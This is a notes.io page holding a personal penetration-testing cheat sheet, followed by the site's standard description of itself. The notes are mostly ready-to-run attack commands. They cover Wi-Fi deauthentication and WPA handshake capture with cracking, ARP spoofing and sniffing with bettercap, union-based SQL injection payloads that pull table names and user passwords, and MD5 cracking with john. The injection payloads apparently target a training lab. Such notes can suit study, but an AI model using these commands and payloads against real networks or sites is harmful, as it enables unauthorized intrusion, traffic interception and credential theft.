NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

Monitor mode:
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
________________________________________

Sniff:
airodump-ng wlan0

Targeted packet sniff:
airodump-ng --bssid <MAC> --channel <number> <interface>

Deauthentication Attack:
aireplay-ng --deauth <number> -a <MAC> -c <MAC> <interface>

________________________________________
HandShake:
airodump-ng --bssid 1C:B7:96:89:60:44 --channel 3 --write handshake_kefia2 wlan0

aireplay-ng --deauth 4 -a 1C:B7:96:89:60:44 -c 70:BB:E9:A8:C0:FD wlan0

Creating a Wordlist:
crunch 5 6 1234abc -o wordlist.txt

Getting MIC (Message Integrity Code):
aircrack-ng wpa_handshake-01.cap -w testpasses.txt

________________________________________
ARP spoof
bettercap -iface eth0
help
help net.probe
net.probe on
net.show
help arp.spoof
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.6
arp.spoof on
net.sniff on




crunch 5 6 1234abc -o wordlist.txt


ٍSQL INJECTION

First name & Sure name
%' or '0'= '0
This is the example of “Always True Scenario”.
Database Statement
SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';

Database version
%' or 0=0 union select null, version() #
Database Statement
SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0' union select null, version() ;

Database User
%' or 0=0 union select null, user() #
Database Statement
SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0' union select null, user() ;

Database Name
%' or 0=0 union select null, database() #
Database Statement
SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0' union select null, database();

Display all tables in information_schema
%' and 1=0 union select null, table_name from information_schema.tables #
Database Statement
SELECT first_name, last_name FROM users WHERE user_id = '%' and ‘1’=’0’ union select null, table_name from information_schema.tables ;
The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.

Display all the user tables in information_schema
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Database Statement
SELECT first_name, last_name FROM users WHERE user_id = %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%';

Display all the columns fields in the information_schema user table
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #

Display all the columns field contents in the information_schema user table
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

Crack hashes using john the ripper
john --list=formats
john --format=Raw-MD5 --wordlist /usr/share/wordlists/rockyou.txt
john --show md5hash --format=Raw-MD5
     
 
what is notes.io
 

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.